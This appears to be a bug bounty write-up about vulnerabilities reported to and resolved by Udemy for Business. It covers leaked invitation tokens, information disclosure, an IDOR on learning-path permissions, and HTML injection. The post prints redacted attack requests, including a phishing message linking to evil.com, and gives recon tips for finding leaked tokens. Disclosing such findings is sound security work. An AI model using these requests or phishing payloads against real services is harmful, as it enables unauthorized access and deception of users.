From URL dumps digging to IDOR , BAC, Massive Phishing in Udemy

Broken Access Control — Udemy

The urls were an invitations for business accounts that belongs to many companies which uses Udemy For Business , These invitations were continuously leaked from time to time on malware scanners as these companies users were scanning the invitation urls for malware.

Invitation Redeem

Information Disclosure-Udemy

Udemy business trial accounts were not showing all business functions or endpoints in their api so i decided to claim one of the tokens to test all possible functionalities and i found a Learning Paths feature.

Disclosing Organizations Learning Paths

I opened burp and intercepted requests to *.udemy.com/learningpaths and i got :

GET /api-2.0/learning-paths/?page=1&page_size=20&fields[learning_path]=@default,is_user_enrolled,estimated_content_length,num_enrollments,folder_ids,is_owner_in_group&list_type=all&ordering=-created HTTP/1.1
Host: █████.udemy.com
HTTP/1.1 200 OK{“count”:30,”next”:”█████","previous":null,"results":[{"_class":"learning_path","id":█████504,"title":"Ethical Hacking”,”description”:”Path to becoming Ethical Hacker. Learning journey would include Web app hacking, N/W hacking, AD hacking, Privilege escalation and much more.”,”owner”:{“_class”:”user”,”id”:█████6538,”display_name”:”█████S”,”image_50x50":”*","initials":"SP"},"is_public":true,"editors":[{"_class":"user","id":█████6538,"display_name":"█████S”,”image_50x50":”█████","initials":"SP"}],"is_user_enrolled":false,"estimated_content_length":3172,"num_enrollments":2,"folder_ids":[],"is_owner_in_group":false},}

Disclosing Trial Organizations Status

GET /api-2.0/organization-trial/status/ HTTP/1.1
Host: █████.udemy.com
HTTP/1.1 200 OK{“available_count”: 5, “active_remaining_days”: 0, “owner_email”: “█████”, “trial_limit_reached”: false, “used_count”: 0, “owner_name”: “█████”, “is_owner”: false, “remaining_seats”: 0}

Insecure Direct Object Reference-Udemy

During my testing i noticed a request is sent to

PUT /api-2.0/learning-paths/█████886/permissions/ HTTP/1.1
Host: █████.udemy.com
{"added_editors_ids":[],"removed_editors_ids":[]}
PUT /api-2.0/learning-paths/█████514/permissions/ HTTP/1.1
Host: █████.udemy.com
{“added_editors_ids”:[
152495920
],”removed_editors_ids”:[]}
HTTP/1.1 200 OK{"results":[{"_class":"user","id":█████034,"display_name":"█████vschi","image_50x50":"█████","initials":"AP"},{"_class":"user","id":152495920,"display_name":"Mostafa Mamdoh","image_50x50":"█████","initials":"MM"}]}

Possible Massive Phishing Attack Through Html Injection

I spotted a recommending feature designed especially for members inside same organization , i used burp and got that request

POST /api-2.0/share/course/█████/recommend/ HTTP/1.1-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="userIds[]"
█████388
-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="userIds[]"
█████382
-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="userIds[]"
█████580
-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="userIds[]"
█████083
-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="userIds[]"
█████288
-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="userIds[]"
█████988
-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="message"
<h1>Hey █████</h1>Please go to https://evil.com/accept to redeem your invite <img src="https://pbs.twimg.com/profile_images/810954665202434052/_m3mPbHa_400x400.jpg" alt="Smiley face" width="42" height="42" style="vertical-align:bottom">
-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="context"
ufb_clp
-----------------------------374017102511920071852193229569--
  • March 3,2021 — Vulnerabilities reported.
  • April 7,2021–Total Bounties Awarded 1300$
  • August 7,2021 — Reports Resolved
  • Use public url archives or scanners to recon for a private instances or a leaked tokens belongs to sensitive features ,Use https://osintframework.com/
  • Try to elevate your content injections impact by chaining it with phishing scenarios

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Mostafa Mamdoh

Mostafa Mamdoh

I’m a Penetration Tester, Bug Hunter @ HackerOne